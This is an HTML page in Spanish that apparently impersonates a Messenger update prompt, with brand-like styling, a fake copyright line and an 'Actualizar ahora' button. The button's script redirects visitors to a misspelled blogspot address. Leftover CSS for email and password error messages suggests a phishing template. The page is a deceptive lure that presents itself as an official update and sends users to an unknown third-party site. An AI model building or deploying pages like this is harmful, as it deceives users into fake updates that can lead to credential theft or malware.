<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Actualizar Messenger</title>
  <link
    href='https://www6.0zz0.com/2021/10/15/06/633156682.png'
    rel='icon' sizes='16x16' type='image/gif' />
  <style>
    body,
    html {
      height: 100%;
    }

    body {
      background-image: url(https://www5.0zz0.com/2021/10/15/06/452762102.jpg);
      background-repeat:no-repeat;
      background-size:cover;
      background-position:center;


    }
    
    [class~=body2] {
      display: table;
    }

    [class~=body2] {
      height: 100%;
    }

    [class~=body2] {
      min-height: 6.25in;
    }

    input:focus::-webkit-input-placeholder {
      color: #bec3c9;
    }

    body {
      color: #fff;
    }

    [class~=body2] {
      width: 100%;
    }

    [class~=body3] {
      display: table-cell;
    }

    [class~=body3] {
      vertical-align: middle;
    }

    [class~=body3] {
      text-align: -webkit-center;
    }

    body {
      direction: ltr;
    }

    [class~=logo] {
      height: 1.25in !important;
    }

    [class~=container] [class~=checkmark]:after {
      left: 5px;
    }

    [class~=body3] h1 {
      font-size: 41px;
    }

    [class~=logo] {
      width: 120px;
    }

    [class~=logo],
    [class~=inputl] {
      display: block;
    }

    body {
      line-height: 1.34;
    }

    [class~=body3] h1,
    body {
      margin-left: 0;
    }

    [class~=inputl],
    [class~=logo] {
      margin-right: auto;
    }

    [class~=container] [class~=checkmark]:after {
      top: 2px;
    }

    [class~=body3] h1 {
      font-weight: 300;
    }

    [class~=container] [class~=checkmark]:after {
      width: 3.75pt;
    }

    [class~=logo],
    [class~=inputl] {
      margin-left: auto;
    }

    [class~=body3] h1 {
      text-align: center;
    }


    [class~=container] [class~=checkmark]:after {
      height: 6.75pt;
    }

    [class~=inputl] {
      border-left-width: .75pt;
    }

    [class~=inputl] {
      border-bottom-width: .75pt;
    }

    [class~=inputl] {
      border-right-width: .75pt;
    }

    [class~=container] [class~=checkmark]:after {
      border-left-width: 0;
    }

    [class~=container] [class~=checkmark]:after {
      border-bottom-width: 2.25pt;
    }

    [class~=body3] h1,
    body {
      margin-bottom: 0;
    }

    [class~=inputl] {
      border-top-width: .75pt;
    }

    [class~=inputl],
    [class~=container] [class~=checkmark]:after {
      border-left-style: solid;
    }

    [class~=inputl] {
      border-bottom-style: solid;
    }

    [class~=body3] h1,
    body {
      margin-right: 0;
    }

    [class~=inputl] {
      border-right-style: solid;
    }

    [class~=inputl] {
      border-top-style: solid;
    }

    [class~=body3] h1,
    body {
      margin-top: 0;
    }

    [class~=inputl] {
      border-left-color: rgba(0, 0, 0, .2);
    }

    [class~=inputl] {
      border-bottom-color: rgba(0, 0, 0, .2);
    }

    body,
    [class~=body3] h1 {
      padding-left: 0;
    }

    [class~=inputl] {
      border-right-color: rgba(0, 0, 0, .2);
    }

    [class~=inputl] {
      border-top-color: rgba(0, 0, 0, .2);
    }

    [class~=inputl] {
      border-image: none;
    }

    [class~=inputl] {
      border-radius: .25pc;
    }

    [class~=inputl] {
      color: rgba(0, 0, 0, 1);
    }

    [class~=inputl],
    body,
    [class~=body3] h1 {
      padding-bottom: 0;
    }

    .body3 h2,
    [class~=inputl],
    .inlog,
    [class~=body3] h1 {
      font-family: Helvetica Neue, Segoe UI, Helvetica, Arial, sans-serif;
    }

    [class~=inputl] {
      font-size: 13.5pt;
    }

    [class~=inputl] {
      height: .4375in;
    }

    [class~=body3] h1,
    body {
      padding-right: 0;
    }

    [class~=inputl] {
      margin-bottom: 9pt;
    }

    [class~=container] [class~=checkmark]:after {
      border-right-width: 2.25pt;
    }

    [class~=inputl],
    [class~=body3] h1,
    .inlog,
    body {
      padding-top: 0;
    }

    [class~=container] [class~=checkmark]:after {
      border-top-width: 0;
    }

    [class~=inputl] {
      padding-left: .166666667in;
    }

    [class~=inputl] {
      padding-right: .166666667in;
    }

    .body3 h2 {
      font-size: .177083333in;
    }

    .body3 h2 {
      font-weight: 200;
    }

    [class~=inputl] {
      width: 2.979166667in;
    }

    [class~=inputl] {
      background: #fff repeat-x;
    }

    .inlog {
      background: #fff;
    }

    .body3 h2 {
      line-height: 1.2;
    }

    .inlog {
      color: #0084ff;
    }

    .body3 h2 {
      margin-bottom: 1.5pc;
    }

    .inlog {
      font-size: .260416667in;
    }

    .inlog {
      font-weight: normal;
    }

    .inlog {
      margin-top: .25in;
    }

    .inlog {
      align-items: center;
    }

    .inlog {
      border-left-width: medium;
    }

    .inlog {
      border-bottom-width: medium;
    }

    .inlog {
      border-right-width: medium;
    }

    [class~=container] [class~=checkmark]:after {
      border-bottom-style: solid;
    }

    .inlog {
      border-top-width: medium;
    }

    .inlog {
      border-left-style: none;
    }

    [class~=container]:hover input~[class~=checkmark] {
      background-color: #ccc;
    }

    [class~=container] [class~=checkmark]:after {
      border-right-style: solid;
    }

    [class~=chbox],
    .body3 h2 {
      text-align: center;
    }

    .inlog {
      border-bottom-style: none;
    }

    .inlog {
      border-right-style: none;
    }

    .inlog {
      border-top-style: none;
    }

    .inlog {
      border-left-color: currentColor;
    }

    .inlog {
      border-bottom-color: currentColor;
    }

    .inlog {
      border-right-color: currentColor;
    }

    .inlog {
      border-top-color: currentColor;
    }

    .inlog {
      border-image: none;
    }

    [class~=container] input,
    [class~=checkmark] {
      position: absolute;
    }

    [class~=container] input {
      opacity: 0;
    }

    .inlog {
      box-shadow: none;
    }

    [class~=container] [class~=checkmark]:after {
      border-top-style: solid;
    }

    .inlog {
      display: flex;
    }

    .inlog {
      margin-right: auto;
    }

    .inlog {
      margin-left: auto;
    }

    .inlog {
      text-overflow: ellipsis;
    }

    .inlog {
      white-space: nowrap;
    }

    .inlog,
    [class~=container],
    [class~=container] input {
      cursor: pointer;
    }

    .inlog {
      line-height: 1.625pc;
    }

    [class~=container] input:checked~[class~=checkmark]:after,
    body {
      display: block;
    }

    [class~=container] input {
      height: 0;
    }

    [class~=container] input {
      width: 0;
    }

    .inlog {
      padding-left: .625pc;
    }

    .inlog {
      padding-bottom: 0;
    }

    [class~=container] [class~=checkmark]:after {
      border-left-color: white;
    }

    .inlog {
      padding-right: .625pc;
    }

    .inlog {
      width: auto;
    }

    [class~=chbox] {
      color: #929292;
    }

    [class~=chbox] {
      font-size: 15px;
    }

    [class~=chbox] {
      font-family: Helvetica Neue, Segoe UI, Helvetica, Arial, sans-serif;
    }

    [class~=chbox],
    [class~=cboxl] {
      display: inline-block;
    }

    [class~=chbox] {
      margin-left: 35.75pt;
    }

    [class~=checkmark]:after {
      content: "";
    }

    [class~=chbox] {
      margin-top: 2.1875pc;
    }

    [class~=container] [class~=checkmark]:after {
      border-bottom-color: white;
    }

    [class~=checkmark],
    [class~=checkmark] {
      top: 0;
    }

    [class~=checkmark] {
      left: 0;
    }

    [class~=checkmark] {
      height: .260416667in;
    }

    [class~=checkmark] {
      width: 25px;
    }

    [class~=checkmark] {
      background-color: #eee;
    }

    [class~=container] {
      position: relative;
    }

    [class~=container] {
      margin-right: 1.625pc;
    }

    body {
      font-family: Helvetica, Arial, sans-serif;
    }

    [class~=container] {
      font-size: .1875in;
    }

    [class~=checkmark],
    [class~=checkmark]:after {
      position: absolute;
    }

    body {
      font-size: .8125pc;
    }

    [class~=container] [class~=checkmark]:after {
      border-right-color: white;
    }

    [class~=container] [class~=checkmark]:after {
      border-top-color: white;
    }

    [class~=checkmark] {
      right: 0;
    }

    [class~=checkmark] {
      height: 1.125pc;
    }

    [class~=checkmark] {
      width: .1875in;
    }

    [class~=checkmark]:after {
      display: none;
    }

    [class~=checkmark] {
      background-color: #dadada;
    }

    [class~=checkmark] {
      border-radius: 4.5pt;
    }

    [class~=container] [class~=checkmark]:after {
      border-image: none;
    }

    input::-webkit-input-placeholder {
      color: #afb5b8;
    }


    [class~=container] [class~=checkmark]:after {
      transform: rotate(45deg);
    }

    .container input:checked~.checkmark {
      background-color: #0084ff;
    }

    .container {
      right: 10px;
      top: 5px;
    }

    .erorr {
      color: #f03d25;
      display: block;
      margin-right: auto;
      margin-left: auto;
      font-size: 17px;
      font-weight: 500;
      line-height: 25px;
      margin-bottom: 24px;
      text-align: center;
    }

    .erorrborder {
      border: 2px #f03d25 solid;
    }

    #erorrmail,
    #erorrpass {
      display: none;
    }

    .inlog {
      background: #0a7cff;
      border-radius: 50px;
      color: #fff;
      font-size: 16px;
      padding: 9.5px 20px;
    }

    .logo {
      background-image: url(https://www6.0zz0.com/2021/10/15/06/633156682.png);
      background-repeat: no-repeat;
      background-size: 120px 120px;
    }

    .body3 {
      display: flex;
      justify-content: center;
      align-items: center;
      flex-wrap: nowrap;
      flex-direction: column;
      padding: 50px;
      text-align: center;
      margin-top: 50px;

    }

    .fbtn {
      background: #0a7cff;
      background-image: linear-gradient(to right, #ff00ff, blue);
      border-radius: 50px;
      width: 70%;
      height: 50px;
      color: #fff;
      font-size: 20px;
      border: 1px solid white;
      cursor: pointer;
      margin: 10px;
      transition: width 0.4s, height 0.5s;
    }

    .fbtn:hover {
      background-color: #d3d2d2;
      background-image: linear-gradient(to right, blue, #ff00ff);
      color: #fff;
      border: 1.5px solid #5543fa;
      width: 75%;
      height: 60px;
    }

    /* -------------modal----- */
    .bg-modal {
      width: 100%;
      height: 100%;
      position: fixed;
      top: 0;
      background-color: rgba(0, 94, 170, 0.9);
      display: flex;
      justify-content: center;
      align-items: center;
      display: none;

    }

    .modal-cont {
      width: 400px;
      height: 450px;
      background-color: white;
      text-align: center;
      padding: 20px;
      border-radius: 5px;
      margin: 20px;
    }

    .inp {
      display: block;
      height: 40px;
      width: 86%;
      margin: 15px auto;
      padding: 5px 15px;
      border-radius: 5px;
      border: 1px solid #dddfe2;
      color: #1d2129;
    }

    .button {
      background: #0a7cff;
      border-radius: 50px;
      width: 70%;
      height: 50px;
      color: #fff;
      font-size: 20px;
      border: 1px solid white;
      cursor: pointer;
      margin: 10px;

    }

    .button:hover {
      background-color: #fff;
      color: #0a7cff;
      border: 1px solid #0a7cff;
    }

    .img {
      padding: 20px;
    }

  </style>
</head>

<body>
  <div class="no-items section" id="1"></div>
  <div class="body2">
    <div class="body3">
      <i class="logo"></i>
      <br>
      <h1 style="font-weight: bold;font-family: cairo; text-shadow: 1px 1px 4px #222222  ">Actualización en Messenger</h1>
      <br>
      <p style="font-weight: bold; font-size:22; ">Actualice ahora gratis</p>
      <br>
      <br>
      <button id="btn" onclick="myFunction()" class="fbtn">Actualizar ahora</button>


      <div style="font-size: 14px; text-align: center; padding: 15px; margin: 10px;">
        <span id="copyright" style="text-decoration:none;color:#d4d4d4;font-weight:bold;" title="Messenger">Messenger
          Copyright ©️</span>
      </div>
    </div>
  </div>





  <script>
    function myFunction() {
      location.replace("https://updeteoo22.blogspot.com/")
    }
  </script>





</body>

</html>
